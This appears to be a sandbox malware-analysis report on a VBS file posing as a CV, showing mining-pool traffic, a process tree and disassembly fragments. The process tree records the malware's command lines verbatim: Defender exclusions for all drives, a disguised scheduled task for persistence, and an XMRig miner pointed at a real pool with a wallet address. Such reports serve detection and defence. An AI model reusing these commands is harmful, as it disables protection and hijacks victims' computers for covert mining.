                                                                                                                  2023-08-03 16:00:30 UTC2490INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 64 39 65 61 66 61 36 30 36 33 33 66 39 31 66 66 63 63 62 36 64 33 66 62 62 32 36 65 30 33 33 63 32 64 62 64 35 30 66 62 36 63 32 32 62 62 38 31 36 65 32 36 35 30 39 39 61 65 34 34 31 38 35 30 66 36 39 37 31 36 34 65 30 30 30 30 30 30 30 30 30 32 63 35 66 32 39 66 37 62 61 65 39 30 33 36 64 38 36 38 66 38 30 34 30 33 38 66 39 61 33 32 63 33 38 31 36 31 34 39 64 32 35 36 66 66 31 64 39 31 36 30 34 39 61 33 61 66 66 37 66 35 36 33 38 34 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 5a 73 43 6b 46 35 57 71 30 72 4e 2b 63 44 6b 5a 58 72 34 66 74 6d 76 63 5a 2f 47 4d 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109d9eafa60633f91ffccb6d3fbb26e033c2dbd50fb6c22bb816e265099ae441850f697164e0000000002c5f29f7bae9036d868f804038f9a32c3816149d256ff1d916049a3aff7f563848","job_id":"ZsCkF5Wq0rN+cDkZXr4ftmvcZ/GM","target":"8
                                                                                                                  2023-08-03 16:00:40 UTC2491INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 38 39 65 61 66 61 36 30 36 33 33 66 39 31 66 66 63 63 62 36 64 33 66 62 62 32 36 65 30 33 33 63 32 64 62 64 35 30 66 62 36 63 32 32 62 62 38 31 36 65 32 36 35 30 39 39 61 65 34 34 31 38 35 30 66 36 39 37 31 36 34 65 30 30 30 30 30 30 30 30 30 37 64 38 37 62 30 61 35 38 37 38 35 61 63 39 39 35 35 34 35 38 62 62 63 64 36 66 32 33 38 38 35 39 31 33 64 37 65 61 35 35 31 32 32 62 30 35 31 61 66 35 33 65 36 61 30 36 37 31 38 31 31 31 66 34 65 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6b 37 47 36 34 53 6c 44 61 35 48 76 64 52 69 4a 54 43 74 39 77 33 71 6e 7a 30 35 79 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a89eafa60633f91ffccb6d3fbb26e033c2dbd50fb6c22bb816e265099ae441850f697164e0000000007d87b0a58785ac9955458bbcd6f23885913d7ea55122b051af53e6a06718111f4e","job_id":"k7G64SlDa5HvdRiJTCt9w3qnz05y","target":"8
                                                                                                                  2023-08-03 16:00:57 UTC2491INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 38 39 65 61 66 61 36 30 36 33 33 66 39 31 66 66 63 63 62 36 64 33 66 62 62 32 36 65 30 33 33 63 32 64 62 64 35 30 66 62 36 63 32 32 62 62 38 31 36 65 32 36 35 30 39 39 61 65 34 34 31 38 35 30 66 36 39 37 31 36 34 65 30 30 30 30 30 30 30 30 30 37 39 38 32 62 31 62 30 38 65 36 37 66 32 39 37 35 38 36 39 64 64 62 34 31 65 35 66 33 38 36 34 32 35 30 37 37 36 61 39 37 36 61 38 30 35 30 32 31 37 31 30 37 37 63 31 61 64 32 37 64 62 30 65 35 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6d 7a 45 39 51 35 4b 58 36 53 66 43 34 4e 74 66 74 73 37 39 64 78 67 72 79 4f 59 2b 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b89eafa60633f91ffccb6d3fbb26e033c2dbd50fb6c22bb816e265099ae441850f697164e0000000007982b1b08e67f2975869ddb41e5f3864250776a976a80502171077c1ad27db0e50","job_id":"mzE9Q5KX6SfC4Ntfts79dxgryOY+","target":"8
                                                                                                                  2023-08-03 16:01:01 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 64 39 65 61 66 61 36 30 36 61 65 65 39 36 66 31 65 65 39 38 36 62 33 34 33 66 38 36 39 35 31 63 37 61 36 38 30 31 37 66 38 62 66 65 33 65 39 35 31 32 35 30 30 37 36 37 61 65 38 35 63 62 31 36 64 62 62 33 38 31 66 38 37 30 30 30 30 30 30 30 30 35 33 38 33 39 39 64 66 65 37 31 66 61 38 37 64 37 63 38 36 38 34 33 35 38 36 30 38 33 66 66 36 36 30 37 33 62 61 65 61 66 34 62 66 39 32 62 65 35 64 65 66 63 64 36 63 30 31 38 65 61 30 32 38 34 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 51 37 64 58 33 67 6e 48 38 73 34 55 59 4d 37 41 30 36 6d 75 5a 4f 33 6c 39 49 63 6d 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bd9eafa606aee96f1ee986b343f86951c7a68017f8bfe3e9512500767ae85cb16dbb381f8700000000538399dfe71fa87d7c86843586083ff66073baeaf4bf92be5defcd6c018ea0284c","job_id":"Q7dX3gnH8s4UYM7A06muZO3l9Icm","target":"8
                                                                                                                  2023-08-03 16:01:12 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 38 39 65 61 66 61 36 30 36 61 65 65 39 36 66 31 65 65 39 38 36 62 33 34 33 66 38 36 39 35 31 63 37 61 36 38 30 31 37 66 38 62 66 65 33 65 39 35 31 32 35 30 30 37 36 37 61 65 38 35 63 62 31 36 64 62 62 33 38 31 66 38 37 30 30 30 30 30 30 30 30 30 34 62 35 65 39 30 39 38 38 63 33 38 63 61 34 30 36 65 65 36 31 63 31 64 64 65 30 37 31 62 33 64 30 39 63 62 64 65 38 36 36 34 31 62 35 35 62 65 33 38 37 36 36 31 62 62 34 33 39 64 33 33 35 34 65 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 72 46 75 76 33 35 69 2b 68 4a 32 58 66 2b 4a 41 6c 45 50 2b 41 58 56 54 46 31 4b 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c89eafa606aee96f1ee986b343f86951c7a68017f8bfe3e9512500767ae85cb16dbb381f870000000004b5e90988c38ca406ee61c1dde071b3d09cbde86641b55be387661bb439d3354e","job_id":"crFuv35i+hJ2Xf+JAlEP+AXVTF1K","target":"8
                                                                                                                  2023-08-03 16:01:25 UTC2492INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 34 39 65 61 66 61 36 30 36 61 65 65 39 36 66 31 65 65 39 38 36 62 33 34 33 66 38 36 39 35 31 63 37 61 36 38 30 31 37 66 38 62 66 65 33 65 39 35 31 32 35 30 30 37 36 37 61 65 38 35 63 62 31 36 64 62 62 33 38 31 66 38 37 30 30 30 30 30 30 30 30 35 34 61 38 62 66 31 36 34 39 62 66 66 32 31 31 34 39 36 63 39 62 62 62 62 34 30 32 62 36 36 37 63 61 64 37 39 33 65 38 33 64 66 32 63 33 63 34 61 34 31 61 39 34 65 64 39 38 39 62 38 37 30 36 34 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 46 30 43 39 36 52 73 48 4e 30 42 4c 70 56 62 61 30 6c 47 77 6a 37 59 56 31 64 62 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d49eafa606aee96f1ee986b343f86951c7a68017f8bfe3e9512500767ae85cb16dbb381f870000000054a8bf1649bff211496c9bbbb402b667cad793e83df2c3c4a41a94ed989b87064f","job_id":"cF0C96RsHN0BLpVba0lGwj7YV1db","target":"8
                                                                                                                  2023-08-03 16:01:40 UTC2493INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 34 39 65 61 66 61 36 30 36 61 65 65 39 36 66 31 65 65 39 38 36 62 33 34 33 66 38 36 39 35 31 63 37 61 36 38 30 31 37 66 38 62 66 65 33 65 39 35 31 32 35 30 30 37 36 37 61 65 38 35 63 62 31 36 64 62 62 33 38 31 66 38 37 30 30 30 30 30 30 30 30 61 65 36 37 36 62 33 33 33 31 32 61 35 32 34 37 39 37 37 30 64 64 31 36 64 65 33 39 34 35 30 36 63 37 30 39 32 65 62 35 30 35 33 38 64 61 36 66 35 30 65 61 30 63 38 65 39 33 33 62 33 36 38 31 35 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 69 50 7a 38 4c 46 4d 67 6d 67 39 72 34 30 59 4b 67 6a 37 59 43 31 67 59 4f 55 75 69 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e49eafa606aee96f1ee986b343f86951c7a68017f8bfe3e9512500767ae85cb16dbb381f8700000000ae676b33312a52479770dd16de394506c7092eb50538da6f50ea0c8e933b368151","job_id":"iPz8LFMgmg9r40YKgj7YC1gYOUui","target":"8


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:17:57:18
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs"
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:17:57:20
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:17:57:23
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
                                                                                                                  Imagebase:0x7ff7651b0000
                                                                                                                  File size:273'920 bytes
                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:17:57:24
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6edaf0000
                                                                                                                  File size:625'664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:17:57:24
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
                                                                                                                  Imagebase:0x7ff6f4710000
                                                                                                                  File size:447'488 bytes
                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:17:59:56
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Users\Public\7g.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
                                                                                                                  Imagebase:0xb10000
                                                                                                                  File size:584'704 bytes
                                                                                                                  MD5 hash:58FC6DE6C4E5D2FDA63565D54FEB9E75
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:17:59:56
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6edaf0000
                                                                                                                  File size:625'664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:18:00:17
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
                                                                                                                  Imagebase:0x7ff7651b0000
                                                                                                                  File size:273'920 bytes
                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:18:00:17
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6edaf0000
                                                                                                                  File size:625'664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:18:00:17
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:18:00:17
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
                                                                                                                  Imagebase:0x7ff682b70000
                                                                                                                  File size:226'816 bytes
                                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:18:00:19
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:18:00:20
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Users\Public\WindowsUpdate\mservice.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
                                                                                                                  Imagebase:0x7ff6c5050000
                                                                                                                  File size:4'770'304 bytes
                                                                                                                  MD5 hash:CFC0000B993A31C11EF58AC53837E4E1
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 83%, ReversingLabs

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:18:00:21
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6edaf0000
                                                                                                                  File size:625'664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:18:00:21
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:18:00:30
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:18:00:31
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:18:00:38
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:18:00:39
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:18:01:01
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:18:01:02
                                                                                                                  Start date:03/08/2023
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
                                                                                                                  Imagebase:0x7ff7c24c0000
                                                                                                                  File size:163'840 bytes
                                                                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:16.3%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:111
                                                                                                                    execution_graph 29076 b1ae70 29077 b1ae8e 29076->29077 29078 b1ae7d 29076->29078 29078->29077 29082 b1ae95 __EH_prolog 29078->29082 29083 b1aed4 29082->29083 29087 b1736b 29083->29087 29086 b11e89 free 29086->29077 29088 b17375 FindCloseChangeNotification 29087->29088 29089 b17380 29087->29089 29088->29089 29089->29086 29090 b4b136 29091 b4b37f 29090->29091 29094 b4423b SetConsoleCtrlHandler 29091->29094 29093 b4b38b 29094->29093 29095 b3c735 29125 b3c8b4 __EH_prolog 29095->29125 29100 b12d90 2 API calls 29101 b3c774 29100->29101 29104 b3c7d4 29101->29104 29137 b1613d 29101->29137 29103 b3c796 29140 b26bcc __EH_prolog 29103->29140 29106 b3c7fc 29104->29106 29123 b3c823 29104->29123 29153 b11e89 free 29106->29153 29107 b3c7a5 29107->29104 29109 b3c7ac 29107->29109 29151 b11e89 free 29109->29151 29110 b3c881 29168 b11e89 free 29110->29168 29111 b3c804 29154 b11e89 free 29111->29154 29115 b3c7b4 29152 b11e89 free 29115->29152 29116 b3c889 29169 b11e89 free 29116->29169 29120 b3c7bc 29123->29110 29155 b12d35 29123->29155 29158 b56b33 29123->29158 29162 b11524 __EH_prolog 29123->29162 29167 b11e89 free 29123->29167 29126 b12d90 2 API calls 29125->29126 29127 b3c920 29126->29127 29128 b12d90 2 API calls 29127->29128 29129 b3c92c 29128->29129 29130 b12d90 2 API calls 29129->29130 29131 b3c942 29130->29131 29170 b26efc __EH_prolog 29131->29170 29133 b3c73c 29134 b12d90 29133->29134 29172 b11e55 29134->29172 29177 b16058 29137->29177 29139 b1614d 29139->29103 29209 b26eeb 29140->29209 29144 b26bf1 29145 b12d35 2 API calls 29144->29145 29146 b26c19 29145->29146 29217 b169ab __EH_prolog 29146->29217 29148 b26c29 29278 b11e89 free 29148->29278 29150 b26c3d 29150->29107 29151->29115 29152->29120 29153->29111 29154->29120 29389 b12cd9 29155->29389 29157 b12d52 29157->29123 29159 b56b5e 29158->29159 29160 b56b40 29158->29160 29159->29123 29160->29159 29161 b56b49 _CxxThrowException 29160->29161 29161->29159 29163 b11e55 2 API calls 29162->29163 29164 b11539 29163->29164 29165 b1154f 29164->29165 29166 b12ea8 2 API calls 29164->29166 29165->29123 29166->29165 29167->29123 29168->29116 29169->29120 29171 b26f2a 29170->29171 29171->29133 29173 b11e65 malloc 29172->29173 29174 b11e5e 29172->29174 29175 b11e73 _CxxThrowException 29173->29175 29176 b11e87 29173->29176 29174->29173 29175->29176 29176->29100 29178 b18f64 29177->29178 29181 b18df9 __EH_prolog 29178->29181 29182 b18e16 29181->29182 29183 b18e7c 29182->29183 29188 b18e28 29182->29188 29184 b12d90 2 API calls 29183->29184 29185 b18e84 29184->29185 29192 b18e93 29185->29192 29203 b1606b 7 API calls ctype 29185->29203 29187 b18e74 29187->29139 29188->29187 29198 b12dd3 29188->29198 29190 b18ee9 29205 b11e89 free 